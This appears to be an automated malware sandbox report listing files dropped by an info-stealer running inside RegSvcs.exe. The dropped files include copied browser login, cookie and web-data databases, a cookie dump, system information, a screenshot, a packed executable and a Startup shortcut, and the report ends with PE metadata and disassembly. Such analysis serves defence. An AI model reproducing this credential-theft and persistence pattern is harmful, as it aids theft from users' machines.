                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\enXYdwTXArzFWeb Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\hC03xPYOkhc5Web Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.1358696453229276
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\ip37mCyN57muLogin Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):49152
                                                        Entropy (8bit):0.8180424350137764
                                                        Encrypted:false
                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\jt2H3t49qaIdCookies

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                        Category:dropped
                                                        Size (bytes):28672
                                                        Entropy (8bit):2.5793180405395284
                                                        Encrypted:false
                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q8h87HgcZDd0Login Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\wi06D4NAVLzfWeb Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.1358696453229276
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8\Cookies\Chrome_Default.txt

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:ASCII text, with very long lines (769), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):6085
                                                        Entropy (8bit):6.038274200863744
                                                        Encrypted:false
                                                        SSDEEP:96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
                                                        MD5:ACB5AD34236C58F9F7D219FB628E3B58
                                                        SHA1:02E39404CA22F1368C46A7B8398F5F6001DB8F5C
                                                        SHA-256:05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
                                                        SHA-512:5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
                                                        Malicious:false
                                                        Preview:.google.com.TRUE./.TRUE.1712145003.NID.ENC893*_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893*_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893*_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

                                                        C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8\History\Firefox_fqs92o4p.default-release.txt

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):112
                                                        Entropy (8bit):4.911305722693245
                                                        Encrypted:false
                                                        SSDEEP:3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
                                                        MD5:978B9515D3688A43726604AC169DF379
                                                        SHA1:D61293AB99332FC45CAE37D78AB17A5DA5BCD189
                                                        SHA-256:CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
                                                        SHA-512:86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
                                                        Malicious:false
                                                        Preview:https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..

                                                        C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8\information.txt

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                        Category:dropped
                                                        Size (bytes):6563
                                                        Entropy (8bit):5.395113980567588
                                                        Encrypted:false
                                                        SSDEEP:96:xzf0MlORk0cT4Aisph+9hcmb/ZArxNV48VP2c+1EzW7dLbyYq5I8kOiPcJUJiuV5:x7+20vAtphWhcmb/CLw9B
                                                        MD5:2C39E7C5E6148CFC2BAEF421D86477C3
                                                        SHA1:176616E6C1F681E086370A6982D88B7513A9E0C3
                                                        SHA-256:ABB4E1FC97D928EA139C62062764C17BD519793D186025054239EB85ED5CE6DD
                                                        SHA-512:1E0429913E62FB633C13FD541A85979FEA6625F329D9FA08DA9422CECEB4DAAF616D10813CC4A6ABC879E0E531EA793E9C0212E3879A125E67D69FF411349196
                                                        Malicious:false
                                                        Preview:Build: default..Version: 2.0....Date: Thu May 23 17:33:05 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: 82cf7db9296b82f6b568f03a6310cc8c....Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8....IP: 8.46.123.175..Location: US, New York City..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 932923 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/5/2024 17:33:5..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdrvhost.exe

                                                        C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8\passwords.txt

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
                                                        Category:dropped
                                                        Size (bytes):4897
                                                        Entropy (8bit):2.518316437186352
                                                        Encrypted:false
                                                        SSDEEP:48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
                                                        MD5:B3E9D0E1B8207AA74CB8812BAAF52EAE
                                                        SHA1:A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
                                                        SHA-256:4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
                                                        SHA-512:B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
                                                        Malicious:false
                                                        Preview:................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\trixy9T_JAyVodxF8\screenshot.png

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):695899
                                                        Entropy (8bit):7.925838200500562
                                                        Encrypted:false
                                                        SSDEEP:12288:dU+YN/zsDAL0Y3Pvn+/ev+Fx2nlnt2ZbpQTqg7mzwYwBUcAw0Nkkgg:dG5z6AL0deGMtWKAwbAzkK
                                                        MD5:39775E031AAFA8E8BB70A8C16BC8F7A1
                                                        SHA1:39770A22F54BAEFDBEEC18E83BB83CB8B08356BB
                                                        SHA-256:23A11F5EE4D1B8DE16596D6CDCAEBD559D13F3FF118448679F8D171BDE3DD2C9
                                                        SHA-512:DA48404BCE8C7815769F4CB19E090373B9D9ECAF6ADA98F8CDCB55B0688FF16038A6F46BC27A444C331A1B930C134B0705307A1BA5358CC8DBFAF26032EC8BFD
                                                        Malicious:false
                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

                                                        C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Thu May 23 20:33:10 2024, mtime=Thu May 23 20:33:10 2024, atime=Thu May 23 20:33:09 2024, length=4563640, window=hide
                                                        Category:dropped
                                                        Size (bytes):1329
                                                        Entropy (8bit):4.92528723670826
                                                        Encrypted:false
                                                        SSDEEP:24:8VHP0lR0gKSBCcdE6ApfB1yNdFdI7qyFm:8VHPuRj+pRB1yVJyF
                                                        MD5:07E715D22EAA1D21037F92E4A49F41CD
                                                        SHA1:8E94F32637914FA7ACD5921B223B65BD73B09ACB
                                                        SHA-256:EB258E5335650A6AF70FC6E8683A2C967FB69F3B37A504B1756912A45CC98420
                                                        SHA-512:AD71EF28D8D15433E1BC8D0A6D315097FC0E67046D6AFEF583E5A817C30041E2A77FF773046BBDAAB99DCC4A953DF5405EADDBDC6275317266B2797288E8EC34
                                                        Malicious:false
                                                        Preview:L..................F.... ..... .X..... .X...'...X.....E.....................X.:..DG..Yr?.D..U..k0.&...&......vk.v........X...7...X.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.P.1......X....Local.<......CW.^.X......b.....................W...L.o.c.a.l.....N.1......X#...Temp..:......CW.^.X#.....l.....................n.x.T.e.m.p.......1......X&...EDGEMS~1.........X&..X&..........................P...E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.....b.2...E..X%. .EdgeMS2.exe.H......X&..X&.....;......................[ .E.d.g.e.M.S.2...e.x.e.......................-....................$.......C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe....E.d.g.e.M.S.2.Q.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.M.S.2._.4.5.c.4.8.c.c.e.2.e.2.d.7.f.b.d.e.a.1.a.f.c.5.1.c.7.c.6.a.d.2.6.\.E.d.g.e.M.S.2...e.x.e.........|

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.966703261383256
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:file.exe
                                                        File size:4'792'320 bytes
                                                        MD5:ee40081ecc9d262a6afb70e92d9092f2
                                                        SHA1:4a6d1f93c7e2907e985ba305f9a23a1ff1e413c2
                                                        SHA256:44f26c626214bd52d8f3b60c149ff03eaeb8d31ae552b3140c666680d9bf096d
                                                        SHA512:2adccb8da71fea68730ecb383231f19deb66f78baafdc524d8bd0bcc182717fcb261da4d526d5d41f73af6e12523597b79264561401ded8d00fc5fd83f3cba85
                                                        SSDEEP:98304:MPk3K5R2pbvXGlxqUuHGRFz5+0KOArjownIrl:M+mR2ZvYk4RFz5zb
                                                        TLSH:1C2633296257D92BD84CF2369801E7B8F512D7C07833C95F3F4A3924ED33B9B2A41266
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.................P...2..D.......Dk.. ...@2...@.. ........................}......rI...@................................

                                                        File Icon

                                                        Icon Hash:13e3e3e3c381d083

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0xab44d0
                                                        Entrypoint Section:.boot
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0xAFC99B72 [Sat Jun 16 13:15:30 2063 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:4328f7206db519cd4e82283211d98e83

                                                        Entrypoint Preview

                                                        Instruction
                                                        call 00007FC65CE63F60h
                                                        push ebx
                                                        mov ebx, esp
                                                        push ebx
                                                        mov esi, dword ptr [ebx+08h]
                                                        mov edi, dword ptr [ebx+10h]
                                                        cld
                                                        mov dl, 80h
                                                        mov al, byte ptr [esi]
                                                        inc esi
                                                        mov byte ptr [edi], al
                                                        inc edi
                                                        mov ebx, 00000002h
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        jnc 00007FC65CE63DFCh
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        jnc 00007FC65CE63E63h
                                                        xor eax, eax
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        jnc 00007FC65CE63EF7h
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc eax, eax
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc eax, eax
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc eax, eax
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc eax, eax
                                                        je 00007FC65CE63E1Ah
                                                        push edi
                                                        mov eax, eax
                                                        sub edi, eax
                                                        mov al, byte ptr [edi]
                                                        pop edi
                                                        mov byte ptr [edi], al
                                                        inc edi
                                                        mov ebx, 00000002h
                                                        jmp 00007FC65CE63DABh
                                                        mov eax, 00000001h
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc eax, eax
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        jc 00007FC65CE63DFCh
                                                        sub eax, ebx
                                                        mov ebx, 00000001h
                                                        jne 00007FC65CE63E3Ah
                                                        mov ecx, 00000001h
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        adc ecx, ecx
                                                        add dl, dl
                                                        jne 00007FC65CE63E17h
                                                        mov dl, byte ptr [esi]
                                                        inc esi
                                                        adc dl, dl
                                                        jc 00007FC65CE63DFCh
                                                        push esi
                                                        mov esi, edi
                                                        sub esi, ebp

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x35c03a0x50.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x35e0000x340ac.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
